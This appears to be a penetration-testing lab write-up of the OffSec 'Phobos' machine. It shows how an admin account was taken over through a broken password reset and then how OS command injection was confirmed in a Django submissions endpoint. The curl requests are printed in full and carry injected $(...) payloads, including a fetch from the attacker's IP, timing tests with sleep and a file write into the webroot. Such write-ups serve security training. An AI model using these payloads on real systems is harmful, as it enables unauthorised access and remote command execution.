internal-phobos.phobos.offsec

A virtual host has been unveiled by enumerating the Subversion repository.

┌──(kali㉿kali)-[~/…/PG_PRACTICE/phobos/svn/dev]
└─$ curl -I -X OPTIONS http://internal-phobos.phobos.offsec/
HTTP/1.1 200 OK
Date: Sun, 09 Mar 2025 15:26:29 GMT
Server: Apache/2.4.29 (Ubuntu)
Content-Length: 0
Allow: GET, POST, PUT, HEAD, OPTIONS
Expires: Sun, 09 Mar 2025 15:26:29 GMT
Cache-Control: max-age=0, no-cache, no-store, must-revalidate, private
X-Frame-Options: DENY
X-Content-Type-Options: nosniff
Referrer-Policy: same-origin
Vary: Accept-Encoding
Content-Type: text/html; charset=utf-8
 
┌──(kali㉿kali)-[~/…/PG_PRACTICE/phobos/svn/dev]
└─$ curl -I http://internal-phobos.phobos.offsec/        
HTTP/1.1 200 OK
Date: Sun, 09 Mar 2025 15:26:43 GMT
Server: Apache/2.4.29 (Ubuntu)
Content-Length: 6077
Expires: Sun, 09 Mar 2025 15:26:43 GMT
Cache-Control: max-age=0, no-cache, no-store, must-revalidate, private
Vary: Cookie,Accept-Encoding
X-Frame-Options: DENY
X-Content-Type-Options: nosniff
Referrer-Policy: same-origin
Set-Cookie: csrftoken=OLOzgm4IbE1jgQwG7Sw6uCKd5WnfR6NSNXEVtxVbmnBfFkxqWEIdGMAnyaly4IvX; expires=Sun, 08 Mar 2026 15:26:43 GMT; Max-Age=31449600; Path=/; SameSite=Lax
Content-Type: text/html; charset=utf-8

Webroot It’s a login page

Although not much is revealed on the screen, the source code of this Django application has already been enumerated.

register

That includes the /register endpoint Creating a testing account.

Authenticated and redirected to the /home endpoint

jobs

File submission is achieve able through the jobs endpoint

File Upload

The file upload feature is not implemented correctly. It doesn’t upload at all. This is expected as revealed in the source code

Password Reset

The password reset feature present at the /account endpoint is vulnerable as it does not check for old password, allowing anyone to reset password for anybody

Resetting the password of the admin user, and it works as expected. Supposedly, the admin user must be a staff member

Successfully authenticated as the admin user

Submissions

The supposed staff member, admin, has access to the /submissions/ endpoint, where the user can either view or delete the file present in the /var/www/html/internal/submissions/ directory

OS Command Injection

Given, there is a OS command injection vulnerability exist in the file parameter of the delete action, I can attempt to verify the critical vulnerability

Network Limited

┌──(kali㉿kali)-[~/PEN-200/PG_PRACTICE/phobos]
└─$ cmd='$(curl http://192.168.45.218/blah)'; time curl -s -X POST http://internal-phobos.phobos.offsec/submissions/ -H 'Content-Type: application/x-www-form-urlencoded' -b 'csrftoken=Mzge3HqUkskMhLrCgOg6Sm36tAYAJmJDIg00kNXey0c1RuuHoRfWUy0Gmo7lt8ML; sessionid=xq2mlknhlq6qaxbski9h52okwmq4c1dj' --data-binary "csrfmiddlewaretoken=PuG5TIGZ30vR3gnYCGKsS8gdatHhuq2pLbqRaOdjhyn6DZq3KJJiUkdN3hQ2ec5x&file=$cmd&action=delete" | grep -w real

It doesn’t appear to work

┌──(kali㉿kali)-[~/PEN-200/PG_PRACTICE/phobos]
└─$ cmd='$(ping -c 1 192.168.45.218)'; time curl -s -X POST http://internal-phobos.phobos.offsec/submissions/ -H 'Content-Type: application/x-www-form-urlencoded' -b 'csrftoken=Mzge3HqUkskMhLrCgOg6Sm36tAYAJmJDIg00kNXey0c1RuuHoRfWUy0Gmo7lt8ML; sessionid=xq2mlknhlq6qaxbski9h52okwmq4c1dj' --data-binary "csrfmiddlewaretoken=PuG5TIGZ30vR3gnYCGKsS8gdatHhuq2pLbqRaOdjhyn6DZq3KJJiUkdN3hQ2ec5x&file=$cmd&action=delete" | grep -w real

Attempting to ping to Kali also fails This might be due to the presence of firewall

Confirmation

┌──(kali㉿kali)-[~/PEN-200/PG_PRACTICE/phobos]
└─$ cmd='$(sleep 10)'; time curl -s -X POST http://internal-phobos.phobos.offsec/submissions/ -H 'Content-Type: application/x-www-form-urlencoded' -b 'csrftoken=Mzge3HqUkskMhLrCgOg6Sm36tAYAJmJDIg00kNXey0c1RuuHoRfWUy0Gmo7lt8ML; sessionid=xq2mlknhlq6qaxbski9h52okwmq4c1dj' --data-binary "csrfmiddlewaretoken=PuG5TIGZ30vR3gnYCGKsS8gdatHhuq2pLbqRaOdjhyn6DZq3KJJiUkdN3hQ2ec5x&file=$cmd&action=delete" | grep -w real
 
real	10.07s
user	0.01s
sys	0.00s
cpu	0%
 
┌──(kali㉿kali)-[~/PEN-200/PG_PRACTICE/phobos]
└─$ cmd='$(sleep 6)'; time curl -s -X POST http://internal-phobos.phobos.offsec/submissions/ -H 'Content-Type: application/x-www-form-urlencoded' -b 'csrftoken=Mzge3HqUkskMhLrCgOg6Sm36tAYAJmJDIg00kNXey0c1RuuHoRfWUy0Gmo7lt8ML; sessionid=xq2mlknhlq6qaxbski9h52okwmq4c1dj' --data-binary "csrfmiddlewaretoken=PuG5TIGZ30vR3gnYCGKsS8gdatHhuq2pLbqRaOdjhyn6DZq3KJJiUkdN3hQ2ec5x&file=$cmd&action=delete" | grep -w real
 
real	6.07s
user	0.00s
sys	0.01s
cpu	0%

The sleep command appears to work. This suggests that the OS command injection works but I am network-limited

Temporary “Shell”

┌──(kali㉿kali)-[~/PEN-200/PG_PRACTICE/phobos]
└─$ cmd='$(echo OS_command_injection > /var/www/html/internal/submissions/out.txt)'; time curl -s -X POST http://internal-phobos.phobos.offsec/submissions/ -H 'Content-Type: application/x-www-form-urlencoded' -b 'csrftoken=Mzge3HqUkskMhLrCgOg6Sm36tAYAJmJDIg00kNXey0c1RuuHoRfWUy0Gmo7lt8ML; sessionid=xq2mlknhlq6qaxbski9h52okwmq4c1dj' --data-binary "csrfmiddlewaretoken=PuG5TIGZ30vR3gnYCGKsS8gdatHhuq2pLbqRaOdjhyn6DZq3KJJiUkdN3hQ2ec5x&file=$cmd&action=delete" | grep -w real
 
real	0.07s
user	0.00s
sys	0.01s
cpu	8%

Writing an arbitrary file to /var/www/html/internal/submissions/out.txt This confirms the OS command injection

InfoSec LAB

Explorer

Phobos_Web_internal-phobos.phobos.offsec